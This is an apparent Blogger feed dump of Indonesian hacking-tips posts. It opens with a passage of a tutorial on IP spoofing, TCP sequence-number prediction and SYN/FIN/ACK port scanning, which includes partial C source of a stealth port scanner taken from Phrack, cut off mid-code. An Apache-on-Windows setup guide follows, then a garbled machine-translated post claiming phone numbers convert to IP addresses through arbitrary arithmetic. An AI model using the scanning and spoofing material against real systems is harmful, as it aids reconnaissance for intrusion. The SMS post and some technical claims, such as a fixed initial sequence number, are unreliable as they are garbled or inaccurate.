/&gt;authentication process or the other. Now the Username-Password pair is the most commonly used form of&lt;br /&gt;authentication, with which we are very much familiar. Now what happens in the Username-Password form&lt;br /&gt;of authentication is that the remote host to which the client is connected to challenges the client by asking&lt;br /&gt;the User to type in the Username and Password. So in this form of authentication, the User needs to&lt;br /&gt;intervened and the remote host challenges the user to enter the Username and Password which act as a from&lt;br /&gt;of authentication.&lt;br /&gt;&lt;br /&gt;Now other than the Password-Username form of authentication there is yet another form of authentication&lt;br /&gt;most users do not know of. This is the Client IP. In this form of authentication, what happens is that the&lt;br /&gt;remote host gets or find out the IP address of the client and compares it with a predefined list of IP's. If the&lt;br /&gt;IP of the client who is trying to establish a connection with the remote host is found in the list of IP's&lt;br /&gt;maintained by the host, then it allows the client access to the shell  'without a password'  as the identity of&lt;br /&gt;the client has already been authenticated.&lt;br /&gt;&lt;br /&gt;Such kind of rust relationships are common in Unix Systems which have certain 'R services' like rsh ,&lt;br /&gt;rlogin , rcp   which have certain security problems and should be avoided. Despite the threat involved most&lt;br /&gt;ISP's in India still keep the ports of the R services open to be exploited by Hackers. You normally establish&lt;br /&gt;a  Rlogin  trust relationship by using the Unix command,&lt;br /&gt;&lt;br /&gt;$&gt;rlogin IP address&lt;br /&gt;&lt;br /&gt;**************&lt;br /&gt;HACKING TRUTH: Well there is definitely a cooler way of establishing a trust relationship with a remote&lt;br /&gt;host, using Telnet. The default port numbers at which the R services run are 512, 513,514&lt;br /&gt;**************&lt;br /&gt;&lt;br /&gt;So how do I spoof my IP? Well in short, to spoof your IP, you need to be able to predict sequence numbers,&lt;br /&gt;this will clearer after reading then next few paragraphs.&lt;br /&gt;&lt;br /&gt;To understand Sequence Numbers you need to go back to, how the TCP protocol works.  You already&lt;br /&gt;know that TCP is a reliable protocol and has certain in-built features which have the ability to rearrange, re-&lt;br /&gt;send lost, duplicated  or out of sequence data. To make sure that the destination is able to rearrange the&lt;br /&gt;datagrams in the correct order, TCP inserts two sequence numbers into each TCP datagram. One Sequence&lt;br /&gt;number tells the receiving computer where a particular datagram belongs while the second sequence&lt;br /&gt;number says how much data has been received by the sender. Anyway, let's move on, TCP also relies on&lt;br /&gt;ACK and NACK messages to ensure that all datagrams have reached the destination error free.&lt;br /&gt;Now we need to reanalyze the TCP Header to understand certain other aspects of sequence numbers and&lt;br /&gt;the ACK Number.&lt;br /&gt;&lt;br /&gt;+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |          Source Port          |       Destination Port        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                        Sequence Number                        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                    Acknowledgment Number                      |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |  Data |           |U|A|P|R|S|F|                                                                       |&lt;br /&gt; | Offset| Reserved  |R|C|S|S|Y|I|            Window                                       |&lt;br /&gt; |           |           |G|K|H|T|N|N|                                                                     |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |           Checksum            |         Urgent Pointer        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |   The Actual Data form the next 500 octets                    |&lt;br /&gt; |                                                               |&lt;br /&gt;&lt;br /&gt;You see the TCP Header contains a Sequence Number which actually represents the sequence number of&lt;br /&gt;the first byte of that particular TCP segment. A sequence number is a 32 Bit number which is attached  to&lt;br /&gt;all bytes (data) being exchanged across a Network. The ACK Number Field in the TCP header, actually&lt;br /&gt;contains the  value of the sequence number which it expects to be the next. Not only that, it also does what&lt;br /&gt;it was meant to do, acknowledge  data received. Confused? Read it again till you get the hang of it.&lt;br /&gt;&lt;br /&gt;When  a connection is established, the initial sequence number or ISN is initialized to 1. This ISN number&lt;br /&gt;is then incremented by 128,000 every second. There is a certain patter according to which the sequence&lt;br /&gt;numbers increment or change which makes then easy to predict.&lt;br /&gt;&lt;br /&gt;To successfully perform IP spoofing or in order to predict Sequence Numbers, you need to be running a&lt;br /&gt;form of UNIX, as Windows does not provide the users with access to really advanced system stuff.&lt;br /&gt;Without a form of Unix IP Spoofing is almost impossible to do.&lt;br /&gt;&lt;br /&gt;This text is not the ultimate guide to IP Spoofing and was aimed at only giving you a general outline of the&lt;br /&gt;whole process. Sequence number Prediction is really, really sophisticated and difficult to understand, but&lt;br /&gt;not impossible to do. However a system administrator can easily save his systems from IP spoofing and this&lt;br /&gt;actually makes it quite useless, nonetheless truly exciting. If You really want to learn IP Spoofing I suggest&lt;br /&gt;you read IP Spoofing Demystified by daemon9/route/infinity which was a part of Issue 48 of PHRACK&lt;br /&gt;magazine, File 14 of 18. Go to the Archive Section of their site, http://www.phrack.com and click on Issue&lt;br /&gt;48.&lt;br /&gt;&lt;br /&gt;This brings me to the other purpose people use IP Spoofing, IP Masking. Now to something as simple as&lt;br /&gt;mask or hide your IP you do not need to go through the complex procedure of guessing sequence numbers&lt;br /&gt;and performing IP Spoofing. There are  proxy servers to do that for you. Read the Net Tools chapter for&lt;br /&gt;further details.&lt;br /&gt;&lt;br /&gt;Port Scanning in Networking Terms&lt;br /&gt;&lt;br /&gt;Earlier we learnt what a Port scan is why it is considered to be such a important tool of getting information&lt;br /&gt;about the remote host, which in turn can be used to exploit any vulnerabilities and break into the system.&lt;br /&gt;We all know how a manual Port Scan works. You launch Telnet and manually Telnet to each Port jotting&lt;br /&gt;down information that you think is important.  In a manual Port Scan, when you telnet to a port of a remote&lt;br /&gt;host, a full three way handshake takes place, which means that  a complete TCP connection opens.&lt;br /&gt;&lt;br /&gt;The earliest and the oldest version of Port Scanners used the same technique. They connected to each port&lt;br /&gt;and established a full three way handshake for a complete TCP connection. The downside of such port&lt;br /&gt;scanners was the fact that as a full TCP connection was being established, the system administrator could&lt;br /&gt;easily detect that someone is trying to port scan his systems to find a vulnerability. However such port&lt;br /&gt;scanning methods also had a bright side, as an actual TCP connection was being established, the port&lt;br /&gt;scanning software did not have to build a Fake Internet Protocol Packet. (This IP Packet is used to scan the&lt;br /&gt;remote systems.) Such TCP scanners too relied on the three-way TCP handshake to detect if a port is open&lt;br /&gt;or not. The Basic process of detecting whether a port is open or not has been described below:&lt;br /&gt;&lt;br /&gt;1.) You send a TCP Packet containing the SYN flag to remote host.&lt;br /&gt;2.) Now the remote host checks whether the port is open or not. If the port is open then it replies with a&lt;br /&gt;TCP packet containing both an ACK message confirming that the port is open and a SYN flag. On the&lt;br /&gt;other hand if the port is closed then the remote host sends the RST flag which resets the connection, in&lt;br /&gt;short closes the connection.&lt;br /&gt;3.) This third phase is optional and involves the sending of an ACK message by the client.&lt;br /&gt;&lt;br /&gt;As TCP Scanners were detectable, programmers around the world developed a new kind of port scanner,&lt;br /&gt;the SYN Scanner, which did not establish a complete TCP connection. These kinds of port scanners remain&lt;br /&gt;undetectable by only sending the first single TCP Packet containing the  SYN flag and establishing a half&lt;br /&gt;TCP Connection. T understand the working of a SYN or Half SYN Port Scanner simply read its 4 step&lt;br /&gt;working-:&lt;br /&gt;&lt;br /&gt;1. SYN Port Scanner sends the first TCP packet containing  the SYN flag to the remote host.&lt;br /&gt;2. The remote system replies with, either a SYN plus ACK or a RST.&lt;br /&gt;3. When the SYN Port scanner receives one of the above responses, it knows whether the respective port&lt;br /&gt;is open or not and whether a daemon is ready listening for connections.&lt;br /&gt;&lt;br /&gt;The SYN Port Scanners were undetectable by most normal system port scan detectors, however newer post&lt;br /&gt;scan detectors like netstat and also some firewalls can filter out such scans. Another downside to such&lt;br /&gt;scanning is that the method in which the scanner makes the IP packet varies from system to system.&lt;br /&gt;&lt;br /&gt;UDP Scanning&lt;br /&gt;&lt;br /&gt;It is yet another port scanning technique which can be used to scan a UDP port to see if it is listening. To&lt;br /&gt;detect an open UDP port, simply send a single UDP Packet to the port. If it is listening, you will get the&lt;br /&gt;response, if it is not, then ICMP takes over and displays the error message, " Destination Port&lt;br /&gt;Unreachable".&lt;br /&gt;&lt;br /&gt;FIN Port Scanners&lt;br /&gt;&lt;br /&gt;FIN Port Scanners are my favorite type of port scanners. They send a single packet containg the FIN flag. If&lt;br /&gt;the remote host returns a RST flag then the port is closed, if no RST flag is returned, then it is open and&lt;br /&gt;listening.&lt;br /&gt;&lt;br /&gt;Some port scanners also use the technique of sending a ACK packet and if the Time To Live or ttl of the&lt;br /&gt;returning packets is lower than the RST packets received (earlier), or if the windows size is greater than&lt;br /&gt;zero, then the port is probably open and listening.&lt;br /&gt;&lt;br /&gt;The Following is the code of a supposedly Stealth Port Scanner which appeared in the Phrack Magazine.&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;* scantcp.c&lt;br /&gt;*&lt;br /&gt;* version 1.32&lt;br /&gt;*&lt;br /&gt;* Scans for listening TCP ports by sending packets to them and waiting for&lt;br /&gt;* replies. Relys upon the TCP specs and some TCP implementation bugs found&lt;br /&gt;* when viewing tcpdump logs.&lt;br /&gt;*&lt;br /&gt;* As always, portions recycled (eventually, with some stops) from n00k.c&lt;br /&gt;* (Wow, that little piece of code I wrote long ago still serves as the base&lt;br /&gt;*  interface for newer tools)&lt;br /&gt;*&lt;br /&gt;* Technique:&lt;br /&gt;* 1. Active scanning: not supported - why bother.&lt;br /&gt;*&lt;br /&gt;* 2. Half-open scanning:&lt;br /&gt;*      a. send SYN&lt;br /&gt;*      b. if reply is SYN|ACK send RST, port is listening&lt;br /&gt;*      c. if reply is RST, port is not listening&lt;br /&gt;*&lt;br /&gt;* 3. Stealth scanning: (works on nearly all systems tested)&lt;br /&gt;*      a. sends FIN&lt;br /&gt;*      b. if RST is returned, not listening.&lt;br /&gt;*      c. otherwise, port is probably listening.&lt;br /&gt;*&lt;br /&gt;* (This bug in many TCP implementations is not limited to FIN only; in fact&lt;br /&gt;*  many other flag combinations will have similar effects. FIN alone was&lt;br /&gt;*  selected because always returns a plain RST when not listening, and the&lt;br /&gt;*  code here was fit to handle RSTs already so it took me like 2 minutes&lt;br /&gt;*  to add this scanning method)&lt;br /&gt;*&lt;br /&gt;* 4. Stealth scanning: (may not work on all systems)&lt;br /&gt;*      a. sends ACK&lt;br /&gt;*      b. waits for RST&lt;br /&gt;*      c. if TTL is low or window is not 0, port is probably listening.&lt;br /&gt;*&lt;br /&gt;* (stealth scanning was created after I watched some tcpdump logs with&lt;br /&gt;*  these symptoms. The low-TTL implementation bug is currently believed&lt;br /&gt;*  to appear on Linux only, the non-zero window on ACK seems to exists on&lt;br /&gt;*  all BSDs.)&lt;br /&gt;*&lt;br /&gt;* CHANGES:&lt;br /&gt;* --------&lt;br /&gt;* 0. (v1.0)&lt;br /&gt;*    - First code, worked but was put aside since I didn't have time nor&lt;br /&gt;*      need to continue developing it.&lt;br /&gt;* 1. (v1.1)&lt;br /&gt;*    - BASE CODE MOSTLY REWRITTEN (the old code wasn't that maintainable)&lt;br /&gt;*    - Added code to actually enforce the usecond-delay without usleep()&lt;br /&gt;*      (replies might be lost if usleep()ing)&lt;br /&gt;* 2. (v1.2)&lt;br /&gt;*    - Added another stealth scanning method (FIN).&lt;br /&gt;*      Tested and passed on:&lt;br /&gt;*      AIX 3&lt;br /&gt;*      AIX 4&lt;br /&gt;*      IRIX 5.3&lt;br /&gt;*      SunOS 4.1.3&lt;br /&gt;*      System V 4.0&lt;br /&gt;*      Linux&lt;br /&gt;*      FreeBSD&lt;br /&gt;*      Solaris&lt;br /&gt;* &lt;br /&gt;*      Tested and failed on:&lt;br /&gt;*      Cisco router with services on ( IOS 11.0)&lt;br /&gt;*&lt;br /&gt;* 3. (v1.21)&lt;br /&gt;*    - Code commented since I intend on abandoning this for a while.&lt;br /&gt;*&lt;br /&gt;* 4. (v1.3)&lt;br /&gt;*    - Resending for ports that weren't replied for.&lt;br /&gt;*      (took some modifications in the internal structures. this also&lt;br /&gt;*  makes it possible to use non-linear port ranges&lt;br /&gt;*  (say 1-1024 and 6000))&lt;br /&gt;*&lt;br /&gt;* 5. (v1.31)&lt;br /&gt;*    - Flood detection - will slow up the sending rate if not replies are&lt;br /&gt;* recieved for STCP_THRESHOLD consecutive sends. Saves alot of resends&lt;br /&gt;* on easily-flooded networks.&lt;br /&gt;*&lt;br /&gt;* 6. (v1.32)&lt;br /&gt;*      - Multiple port ranges support.&lt;br /&gt;*        The format is: &lt;start-end&gt;|&lt;num&gt;[,&lt;start-end&gt;|&lt;num&gt;,...]&lt;br /&gt;*&lt;br /&gt;*        Examples: 20-26,113&lt;br /&gt;*                  20-100,113-150,6000,6660-6669&lt;br /&gt;* &lt;br /&gt;* PLANNED: (when I have time for this)&lt;br /&gt;* ------------------------------------&lt;br /&gt;* (v2.x) - Multiple flag combination selections, smart algorithm to point&lt;br /&gt;*          out uncommon replies and cross-check them with another flag&lt;br /&gt;*     &lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#define RESOLVE_QUIET&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;netinet h=""&gt;&lt;br /&gt;#include &lt;netinet h=""&gt;&lt;br /&gt;#include &lt;netinet h=""&gt;&lt;br /&gt;#include &lt;sys h=""&gt;&lt;br /&gt;#include &lt;sys h=""&gt;&lt;br /&gt;#include &lt;sys h=""&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;signal.h&gt;&lt;br /&gt;#include &lt;errno.h&gt;&lt;br /&gt;#include "resolve.c"&lt;br /&gt;#include "tcppkt03.c"&lt;br /&gt;&lt;br /&gt;#define STCP_VERSION "1.32"&lt;br /&gt;#define STCP_PORT  1234         /* Our local port. */&lt;br /&gt;#define STCP_SENDS 3         &lt;br /&gt;#define STCP_THRESHOLD 8&lt;br /&gt;#define STCP_SLOWFACTOR 10&lt;br /&gt;&lt;br /&gt;/* GENERAL ROUTINES ------------------------------------------- */&lt;br /&gt;&lt;br /&gt;void banner(void)&lt;br /&gt;  {&lt;br /&gt;printf("\nscantcp\n");&lt;br /&gt;printf("version %s\n",STCP_VERSION);&lt;br /&gt;  }&lt;br /&gt;void usage(const char *progname)&lt;br /&gt;  {&lt;br /&gt;printf("\nusage: \n");&lt;br /&gt;printf("%s &lt;method&gt; &lt;source&gt; &lt;dest&gt; &lt;ports&gt; &lt;udelay&gt; &lt;delay&gt; [sf]\n\n",progname);&lt;br /&gt;     printf("\t&lt;method&gt; : 0: half-open scanning (type 0, SYN)\n");&lt;br /&gt;printf("\t           1: stealth scanning (type 1, FIN)\n");&lt;br /&gt;printf("\t           2: stealth scanning (type 2, ACK)\n");&lt;br /&gt;printf("\t&lt;source&gt; : source address (this host)\n");&lt;br /&gt;printf("\t&lt;dest&gt;   : target to scan\n");&lt;br /&gt;printf("\t&lt;ports&gt;  : ports/and or ranges to scan - eg: 21-30,113,6000\n");&lt;br /&gt;printf("\t&lt;udelay&gt; : microseconds to wait between TCP sends\n");&lt;br /&gt;printf("\t&lt;delay&gt;  : seconds to wait for TCP replies\n");&lt;br /&gt;printf("\t[sf]     : slow-factor in case sends are dectected to be too fast\n\n");&lt;br /&gt;  }&lt;br /&gt;/* OPTION PARSING etc ---------------------------------------- */&lt;br /&gt;unsigned char *dest_name;&lt;br /&gt;unsigned char *spoof_name;&lt;br /&gt;struct sockaddr_in destaddr;&lt;br /&gt;unsigned long dest_addr;&lt;br /&gt;unsigned long spoof_addr;&lt;br /&gt;unsigned long usecdelay;&lt;br /&gt;unsigned      waitdelay;&lt;br /&gt;&lt;br /&gt;int slowfactor = STCP_SLOWFACTOR;&lt;br /&gt;&lt;br /&gt;struct portrec           /* the port-data structure */&lt;br /&gt;{&lt;br /&gt;unsigned           n;&lt;br /&gt;int                state;&lt;br /&gt;unsigned char      ttl;&lt;br /&gt;unsigned short int window;&lt;br /&gt;unsigned long int  seq;&lt;br /&gt;char               sends;&lt;br /&gt;&lt;br /&gt;} *ports;&lt;br /&gt;&lt;br /&gt;char *portstr;&lt;br /&gt;&lt;br /&gt;unsigned char scanflags;&lt;br /&gt;&lt;br /&gt;int done;&lt;br /&gt;&lt;br /&gt;int rawsock;          /* socket descriptors */&lt;br /&gt;int tcpsock;&lt;br /&gt;&lt;br /&gt;int lastidx = 0;         /* last sent index */&lt;br /&gt;int maxports;                          /* total number of ports */&lt;br /&gt;&lt;br /&gt;void timeout(int signum)        /* timeout handler           */&lt;br /&gt;  {       &amp;amp;&lt;/delay&gt;&lt;/udelay&gt;&lt;/ports&gt;&lt;/dest&gt;&lt;/method&gt;&lt;/delay&gt;&lt;/udelay&gt;&lt;/ports&gt;&lt;/dest&gt;&lt;/method&gt;&lt;/errno.h&gt;&lt;/signal.h&gt;&lt;/string.h&gt;&lt;/stdlib.h&gt;&lt;/unistd.h&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/netinet&gt;&lt;/netinet&gt;&lt;/netinet&gt;&lt;/stdio.h&gt;&lt;/num&gt;&lt;/start-end&gt;&lt;/num&gt;&lt;/start-end&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-4123508427134771902?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/4123508427134771902/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/02/tcpip.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4123508427134771902'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/4123508427134771902'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/02/tcpip.html' title='TCP/IP'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nLUUYT3afN4/TVEqdkNoicI/AAAAAAAAAEY/bvQJsQouWrk/s72-c/tcp.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1145294877823225462</id><published>2011-02-08T03:13:00.000-08:00</published><updated>2011-02-08T03:24:25.718-08:00</updated><title type='text'>Installing Apache on Windows</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nLUUYT3afN4/TVEnioNaiNI/AAAAAAAAAD4/ObdPK0pZh3Q/s1600/apache_display.png"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 261px; height: 285px;" src="http://4.bp.blogspot.com/_nLUUYT3afN4/TVEnioNaiNI/AAAAAAAAAD4/ObdPK0pZh3Q/s320/apache_display.png" alt="" id="BLOGGER_PHOTO_ID_5571277689896732882" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Installing Apache on &lt;a href="http://www.microsoft.com/windows/windows-xp/default.aspx"&gt;Windows&lt;/a&gt;, why? Because let's face it Windows&lt;br /&gt;is easy, and well Apache sure beats using IIS. This tutorial is meant for the person who would like to set up there own little&lt;br /&gt;web server. It's not meant for the IT Person running a fortune 500 company. But hey if you want go ahead.&lt;br /&gt;&lt;br /&gt;Instalation:&lt;br /&gt;&lt;br /&gt;First thing you need is to download the webserver. Now for windows&lt;br /&gt;users your gonna want to go download the .exe . The apache website is www.apache.org Your gonna wanna head to the apache&lt;br /&gt;binaries sections for Win32 I believe it is at http://www.apache.org/dist/httpd/binaries/win32/&lt;br /&gt;There you will be able to download a version of apache.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now before you download it you gonna want to make a folder. This folder is&lt;br /&gt;where your gonna server your root directory. Now if you don't want to do&lt;br /&gt;this it's ok. You can use the default path if you want. Put usually this helps&lt;br /&gt;in setting up other things like php, and MySQL. Most people do is they create&lt;br /&gt;a folder in the C:\ directory called WWW or somthin. You can name it whatever you want.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ok so have downloaded the Apache Web Server. Your ready to go with the setup.&lt;br /&gt;No the version I have downloaded was apache_2.0.36-win32-x86-no_ssl.msi This&lt;br /&gt;was a newer version and supposedly supposed to be more secure. The first screen you get when your in the setup is The welcome screen we don't care much about that&lt;br /&gt;but owell so hit next. The next screen is the terms and service. And yes&lt;br /&gt;your going to agree to the terms duh. The next screen is some documentation.&lt;br /&gt;I never really read it but if you want go ahead and do it. Once your done&lt;br /&gt;hit next again. Know we see a screen that says enter a network domain. Erase what is ever in there and type localhost. Now the next box says&lt;br /&gt;Servername, erace what is ever in the box and put in localhost.&lt;br /&gt;The next is Administrators e-mail address. Go ahead and fill that in.&lt;br /&gt;But make sure to change it. Now there are 2 little radio buttons.&lt;br /&gt;Pick the one that best suites your needs. Now that we got that all&lt;br /&gt;filled out. Hit Next and you'll go to a screen that asks you which&lt;br /&gt;type of install you want to do. Then hit next.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you wanted to server out of your one special folder. Change the&lt;br /&gt;file location of were your gonna install apache. Or just leave it at the default path. Click install and it should be on&lt;br /&gt;it's way. Once it's done installing hit the finish button.&lt;br /&gt;&lt;br /&gt;The test:&lt;br /&gt;First were gonna check to see if Apache installed correctly.&lt;br /&gt;This is how we do it. Open up Internet Explorer and type in " http://localhost" . If everything went smooth then you should&lt;br /&gt;be seeing a message that looks like this" Seeing this instead of the website you expected?" Yippee!!!&lt;br /&gt;Apache is working. See now wasnt' that really simple. Ok now were gonna&lt;br /&gt;do some fun stuff.&lt;br /&gt;&lt;br /&gt;Alright now that we got or test done lets move on to changing some of this&lt;br /&gt;stuff that apache did on default. In Internet Explorer if you installed&lt;br /&gt;on the deafult path. Make your way to C:\Program Files\Apache Group\Apache2&lt;br /&gt;This is your Main Apache Directory were you can find everything. If you want&lt;br /&gt;take a short break and run around. There are some cool things there. Don't&lt;br /&gt;worry if you don't understand what's in these files just yet.&lt;br /&gt;&lt;br /&gt;Break Time:&lt;br /&gt;Go take a leak, get some pepsi and somthin to eat. If you got smokes light&lt;br /&gt;them up in your new found glory.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Alright so now you've got apache installed and your about to start dishing out&lt;br /&gt;your web pages that you took so much time on to build. Head to the folder called&lt;br /&gt;htdocs, this is your main folder. There should be a whole bunch of pages What i do&lt;br /&gt;is i select them all and move them to another folder. The htdocs folder is the best&lt;br /&gt;folder in the world. It's gonna be one of the places you spend most of your time&lt;br /&gt;dishing out content for the world. Ok so get rid of all that stuff that is in your&lt;br /&gt;htdocs folder. And move all your great content inside replacing it. Alright so now&lt;br /&gt;once we moved all are content inside the htdocs folder and we tested it to make&lt;br /&gt;sure it was there. http://localhost remember. Now let's get out of there. Go to&lt;br /&gt;Apache's main directory. Now just to be aware of what is going on and get a good&lt;br /&gt;example of how Apache Functions head off to a folder called "conf" This is the&lt;br /&gt;configuration files Apache Uses. If you ever wanted to install php and other&lt;br /&gt;server side scripting languages this is where you would do it. Now you get 2 copys&lt;br /&gt;Use 1 as a backup and never edit it at all. Go ahead and open the folder and open&lt;br /&gt;"httpd.conf" Read it very carefully cause in this tutorial were not gonna read&lt;br /&gt;about it. I just want you to know it's there. Anytime you edit the httpd.conf file&lt;br /&gt;you must re-start apache in order for it to work. Another good tip for you new people&lt;br /&gt;to apache is you may notice the log files. Yes there great and make sure to make backups&lt;br /&gt;of the logs they will come in handy. As security precautions. I also recommend getting&lt;br /&gt;a firewall set up. There are lots of great security features that apache has but this&lt;br /&gt;is a tutorial to installing apache.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Alright so now you've got your webpages up. But the only way people will be able to view&lt;br /&gt;your pages is my typing in your ip address. This is a bumper. Lets look at some free&lt;br /&gt;re-directories. www.n2v.net, This is a cool one. You sign up put your ip adress of your&lt;br /&gt;new webserver in and whalla your done. Type in www. .n2v.net and it goes to your server&lt;br /&gt;and brings up your super nice webpages. Now if you go to google and search for free&lt;br /&gt;domain names or re-directors you should come up with alot. Many People already know&lt;br /&gt;about the www.dot.tk one of the coolest things in the world. Free .tk very simple&lt;br /&gt;That's all you need. It works perfect for my webserver and I've got around 3,000 hits&lt;br /&gt;so it's working good. If you don't wanna do it you don't have to. But it just&lt;br /&gt;makes it simple.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Alright that comes to the conclusion of installing Apache Win32 for WINDOWS users.&lt;br /&gt;Very easy. One last thing Please Read more of the Apache&lt;br /&gt;Documentation either on there website or in your Apache2&lt;br /&gt;directory. If you liked reading this tutorial on how to setup Apache check my&lt;br /&gt;website for others at www.bonfire.tk . Yes there will be follow ups. I'll be&lt;br /&gt;writing another apache tutorail soon so you can set up PHP. The most awesome&lt;br /&gt;scripting language ever built. And also another on how to secure Apache and yes&lt;br /&gt;ALL FOR WINDOWS!! .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1145294877823225462?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1145294877823225462/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/02/installing-apache-on-windows.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1145294877823225462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1145294877823225462'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/02/installing-apache-on-windows.html' title='Installing Apache on Windows'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nLUUYT3afN4/TVEnioNaiNI/AAAAAAAAAD4/ObdPK0pZh3Q/s72-c/apache_display.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1184009001283460594</id><published>2011-01-25T01:17:00.000-08:00</published><updated>2011-01-25T01:27:54.605-08:00</updated><title type='text'>Send messages from Internet computers to Hp</title><content type='html'>&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="disini saya hanya mengajarkan anda bagaimana  mengirim SMS dari internet ke HP, sebenarnya teknik ini tidak saya  postingkan, karena takut untuk kejahatan." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;Here I only teach you how  to send SMS from the internet to HP, actually I posted this technique  does not, for fear for crime.  &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="yang terbilang begitu jadi saya hanya memberikan singkatnya saja  jika anda menginginkan lebih lengkapnya, saya masih ragu - ragu." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;fee that is so short so I  only give it if you want more details, I am still in doubt - doubt.  &lt;/span&gt;&lt;span title="pertama siap kan satu nomor HP anda terserah  memakai nomor apa saja." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;The first one is ready to  do your cell phone number is up to wear any number.  &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="misalkan 085 646 352 643 bagai mana untuk mengirim mengunakan  internet sebagai tool utama saya mengunakan CMD milik windows" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;eg 085 646 352 643 how  where to send using the Internet as the main tool I use the CMD of  windows  &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="angka 08 merupakan angka Operator teller di buat ke kode negara  +62 di jadikan hex" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;number 08 is the number  operator in the tellers have made to make the country code +62 in hex. &lt;/span&gt;&lt;span title="tujuan ini mencari ip address dari nomor hp anda  sebenarnya." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;These objectives find ip  address of your actual hp numbers.&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="angka di belakang 08 itu hasil asci yang bisa di baca." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;08 points behind the ASCI  results that can be read.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="56  + 20 / 10 = 7.6 jika kurang dari angka 8 di buat kan menjadi 8" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;56 + 20 / 10 = 7.6 if  less than the number 8 made it into 8&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="46  = 